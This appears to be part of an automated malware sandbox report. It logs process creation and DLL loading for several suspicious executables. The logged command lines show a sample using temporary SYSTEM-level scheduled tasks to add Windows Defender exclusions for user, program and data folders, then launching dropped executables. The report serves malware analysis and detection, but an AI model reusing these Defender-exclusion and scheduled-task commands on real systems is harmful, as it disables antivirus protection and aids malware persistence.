              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
              Source: unknownProcess created: C:\Program Files (x86)\K5YQV85\6WWeC.exe "C:\Program Files (x86)\K5YQV85\6WWeC.exe"
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
              Source: unknownProcess created: C:\Program Files (x86)\K5YQV85\6WWeC.exe "C:\Program Files (x86)\K5YQV85\6WWeC.exe"
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: pid.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Users\user\Desktop\45631.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: twext.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: acppage.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: tbcore3u.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: devenum.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeSection loaded: tbcore3u.dll
              Source: C:\Users\user\Desktop\45631.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
